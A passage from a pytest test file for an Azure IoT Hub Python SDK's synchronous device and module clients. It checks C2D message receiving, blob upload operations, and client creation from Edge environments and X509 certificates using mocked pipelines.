# Verify C2D Messaging not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
        )  # Note: the return value being checked here is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, iothub_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(iothub_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, iothub_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
        It should only be used for tests where manual control of a callback is required.
"""
return IoTHubModuleClient(iothub_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the IoTHubPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_input_message_received is not None
assert (
client._iothub_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig,
SharedClientCreateFromConnectionStringTests,
ConfigurationSharedClientCreateFromConnectionStringTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig
):
@pytest.mark.it(
"Uses Edge container environment variables to create an IoTEdgeAuthenticationProvider"
)
def test_auth_provider_creation(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
mock_auth_init = mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
client_class.create_from_edge_environment()
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
gateway_hostname=edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"],
module_generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
@pytest.mark.it(
"Ignores any Edge local debug environment variables that may be present, in favor of using Edge container variables"
)
def test_auth_provider_creation_hybrid_env(
self, mocker, client_class, edge_container_environment, edge_local_debug_environment
):
# This test verifies that with a hybrid environment, the auth provider will always be
# an IoTEdgeAuthenticationProvider, even if local debug variables are present
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment)
mock_edge_auth_init = mocker.patch(
"azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider"
)
mock_sk_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
client_class.create_from_edge_environment()
assert mock_edge_auth_init.call_count == 1
assert mock_sk_auth_parse.call_count == 0 # we did NOT use SK auth
assert mock_edge_auth_init.call_args == mocker.call(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
gateway_hostname=edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"],
module_generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
@pytest.mark.it(
"Uses the IoTEdgeAuthenticationProvider to create an IoTHubPipeline and an HTTPPipeline"
)
def test_pipeline_creation(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mock_http_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
client_class.create_from_edge_environment()
assert mock_iothub_pipeline_init.call_count == 1
assert mock_iothub_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
assert mock_http_pipeline_init.call_count == 1
        # The HTTPPipeline is expected to receive the same auth provider and pipeline config as in the IoTHubPipeline assertion above.
assert mock_http_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
@pytest.mark.it("Uses the IoTHubPipeline and the HTTPPipeline to instantiate the client")
def test_client_instantiation(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
# Always patch the IoTEdgeAuthenticationProvider to prevent I/O operations
mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
mock_iothub_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.IoTHubPipeline"
).return_value
mock_http_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_edge_environment()
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(
mocker.ANY, mock_iothub_pipeline, mock_http_pipeline
)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
# Always patch the IoTEdgeAuthenticationProvider to prevent I/O operations
mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var",
[
"IOTEDGE_MODULEID",
"IOTEDGE_DEVICEID",
"IOTEDGE_IOTHUBHOSTNAME",
"IOTEDGE_GATEWAYHOSTNAME",
"IOTEDGE_APIVERSION",
"IOTEDGE_MODULEGENERATIONID",
"IOTEDGE_WORKLOADURI",
],
)
def test_bad_environment(
self, mocker, client_class, edge_container_environment, missing_env_var
):
# Remove a variable from the fixture
del edge_container_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_container_environment)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
@pytest.mark.it("Raises OSError if there is an error using the Edge for authentication")
def test_bad_edge_auth(self, mocker, client_class, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment)
mock_auth = mocker.patch("azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider")
my_edge_error = IoTEdgeError()
mock_auth.side_effect = my_edge_error
with pytest.raises(OSError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_edge_error
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment -- Configuration"
)
class TestConfigurationIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig
):
@pytest.fixture
def mock_open(self, mocker):
return mocker.patch.object(io, "open")
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
client_class.create_from_edge_environment()
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_iothub_pipeline_init.call_args[0][1].blob_upload is False
assert mock_iothub_pipeline_init.call_args[0][1].method_invoke is True
assert mock_iothub_pipeline_init.call_args[0][1].websockets is False
assert mock_iothub_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self,
mocker,
client_class,
edge_local_debug_environment,
websockets,
product_info,
mock_open,
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_edge_environment(**kwargs)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_iothub_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_iothub_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_edge_environment(**kwargs)
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(IoTHubModuleClientTestsConfig):
@pytest.fixture
def mock_open(self, mocker):
return mocker.patch.object(io, "open")
@pytest.mark.it(
"Extracts the CA certificate from the file indicated by the EdgeModuleCACertificateFile environment variable"
)
def test_read_ca_cert(self, mocker, client_class, edge_local_debug_environment, mock_open):
mock_file_handle = mock_open.return_value.__enter__.return_value
mocker.patch.dict(os.environ, edge_local_debug_environment)
client_class.create_from_edge_environment()
assert mock_open.call_count == 1
assert mock_open.call_args == mocker.call(
edge_local_debug_environment["EdgeModuleCACertificateFile"], mode="r"
)
assert mock_file_handle.read.call_count == 1
@pytest.mark.it(
"Uses Edge local debug environment variables to create a SymmetricKeyAuthenticationProvider (with CA cert)"
)
def test_auth_provider_creation(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
expected_cert = mock_open.return_value.__enter__.return_value.read.return_value
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
client_class.create_from_edge_environment()
assert mock_auth_parse.call_count == 1
assert mock_auth_parse.call_args == mocker.call(
edge_local_debug_environment["EdgeHubConnectionString"]
)
assert mock_auth_parse.return_value.ca_cert == expected_cert
@pytest.mark.it(
"Only uses Edge local debug variables if no Edge container variables are present in the environment"
)
def test_auth_provider_and_pipeline_hybrid_env(
self,
mocker,
client_class,
edge_container_environment,
edge_local_debug_environment,
mock_open,
):
# This test verifies that with a hybrid environment, the auth provider will always be
# an IoTEdgeAuthenticationProvider, even if local debug variables are present
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment)
mock_edge_auth_init = mocker.patch(
"azure.iot.device.iothub.auth.IoTEdgeAuthenticationProvider"
)
mock_sk_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
client_class.create_from_edge_environment()
assert mock_edge_auth_init.call_count == 1
assert mock_sk_auth_parse.call_count == 0 # we did NOT use SK auth
assert mock_edge_auth_init.call_args == mocker.call(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
gateway_hostname=edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"],
module_generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
@pytest.mark.it(
"Uses the SymmetricKeyAuthenticationProvider to create an IoTHubPipeline and an HTTPPipeline"
)
def test_pipeline_creation(self, mocker, client_class, edge_local_debug_environment, mock_open):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse.return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
mock_iothub_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
mock_http_pipeline_init = mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
client_class.create_from_edge_environment()
assert mock_iothub_pipeline_init.call_count == 1
assert mock_iothub_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
assert mock_http_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_args == mocker.call(
mock_auth, mock_config_init.return_value
)
@pytest.mark.it("Uses the IoTHubPipeline and the HTTPPipeline to instantiate the client")
def test_client_instantiation(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_iothub_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.IoTHubPipeline"
).return_value
mock_http_pipeline = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_edge_environment()
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(
mocker.ANY, mock_iothub_pipeline, mock_http_pipeline
)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, edge_local_debug_environment, mock_open):
mocker.patch.dict(os.environ, edge_local_debug_environment)
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var", ["EdgeHubConnectionString", "EdgeModuleCACertificateFile"]
)
def test_bad_environment(
self, mocker, client_class, edge_local_debug_environment, missing_env_var, mock_open
):
# Remove a variable from the fixture
del edge_local_debug_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_local_debug_environment)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
# TODO: If auth package was refactored to use ConnectionString class, tests from that
# class would increase the coverage here.
@pytest.mark.it(
"Raises ValueError if the connection string in the EdgeHubConnectionString environment variable is invalid"
)
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param("", id="Empty string"),
pytest.param(
"HostName=Invalid;DeviceId=Invalid;ModuleId=Invalid;SharedAccessKey=Invalid;GatewayHostName=Invalid",
id="Malformed Connection String",
marks=pytest.mark.xfail(reason="Bug in pipeline + need for auth refactor"), # TODO
),
],
)
def test_bad_connection_string(
self, mocker, client_class, edge_local_debug_environment, bad_cs, mock_open
):
edge_local_debug_environment["EdgeHubConnectionString"] = bad_cs
mocker.patch.dict(os.environ, edge_local_debug_environment)
with pytest.raises(ValueError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises ValueError if the filepath in the EdgeModuleCACertificateFile environment variable is invalid"
)
def test_bad_filepath(self, mocker, client_class, edge_local_debug_environment, mock_open):
        # To make tests compatible with Python 2 & 3, redefine errors
try:
FileNotFoundError # noqa: F823
except NameError:
FileNotFoundError = IOError
mocker.patch.dict(os.environ, edge_local_debug_environment)
my_fnf_error = FileNotFoundError()
mock_open.side_effect = my_fnf_error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_fnf_error
@pytest.mark.it(
"Raises ValueError if the file referenced by the filepath in the EdgeModuleCACertificateFile environment variable cannot be opened"
)
def test_bad_file_io(self, mocker, client_class, edge_local_debug_environment, mock_open):
# Raise a different error in Python 2 vs 3
if six.PY2:
error = IOError()
else:
error = OSError()
mocker.patch.dict(os.environ, edge_local_debug_environment)
mock_open.side_effect = error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is error
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_x509_certificate() -- Configuration"
)
class TestConfigurationIoTHubModuleClientCreateFromX509Certificate(IoTHubModuleClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
module_id = "Charms"
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(self, mocker, client_class, mock_pipeline_init, x509):
mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].blob_upload is False
assert mock_pipeline_init.call_args[0][1].method_invoke is False
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self, mocker, client_class, mock_pipeline_init, x509, websockets, product_info
):
mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_x509_certificate(
x509=x509,
hostname=self.hostname,
device_id=self.device_id,
module_id=self.module_id,
**kwargs
)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, x509
):
mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509,
hostname=self.hostname,
device_id=self.device_id,
module_id=self.module_id,
**kwargs
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(IoTHubModuleClientTestsConfig):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
module_id = "Charms"
@pytest.mark.it("Uses the provided arguments to create a X509AuthenticationProvider")
def test_auth_provider_creation(self, mocker, client_class, x509):
mock_auth_init = mocker.patch("azure.iot.device.iothub.auth.X509AuthenticationProvider")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert mock_auth_init.call_count == 1
assert mock_auth_init.call_args == mocker.call(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
@pytest.mark.it("Uses the X509AuthenticationProvider to create an IoTHubPipeline")
def test_pipeline_creation(self, mocker, client_class, x509, mock_pipeline_init):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.X509AuthenticationProvider"
).return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
def test_client_instantiation(self, mocker, client_class, x509):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
def test_returns_client(self, mocker, client_class, x509):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert isinstance(client, client_class)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
